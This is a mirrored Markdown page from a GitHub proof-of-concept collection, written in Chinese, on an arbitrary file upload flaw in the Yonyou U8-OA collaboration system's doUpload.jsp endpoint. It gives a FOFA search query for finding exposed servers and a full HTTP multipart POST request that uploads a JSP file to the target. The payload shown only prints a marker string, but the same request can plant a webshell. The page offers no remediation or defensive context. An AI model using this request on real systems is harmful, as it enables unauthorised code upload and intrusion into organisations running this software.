mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-08-12 11:06:19 +00:00
29 lines
916 B
Markdown
29 lines
916 B
Markdown
![]() |
## 用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞
|
||
|
|
||
|
## fofa
|
||
|
```
|
||
|
"用友U8 Cloud"
|
||
|
```
|
||
|

|
||
|
|
||
|
## poc
|
||
|
```
|
||
|
POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
|
||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
|
||
|
Accept-Encoding: gzip, deflate, br
|
||
|
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
|
||
|
Connection: closeContent-Type: multipart/form-data; boundary=7b1db34fff56ef636e9a5cebcd6c9a75
|
||
|
Host:
|
||
|
Upgrade-Insecure-Requests: 1
|
||
|
Content-Length: 217
|
||
|
|
||
|
--7b1db34fff56ef636e9a5cebcd6c9a75
|
||
|
Content-Disposition: form-data; name="iconFile"; filename="info.jsp"
|
||
|
Content-Type: application/octet-stream
|
||
|
|
||
|
<% out.println("tteesstt1"); %>
|
||
|
--7b1db34fff56ef636e9a5cebcd6c9a75--
|
||
|
```
|
||
|
|
||
|

|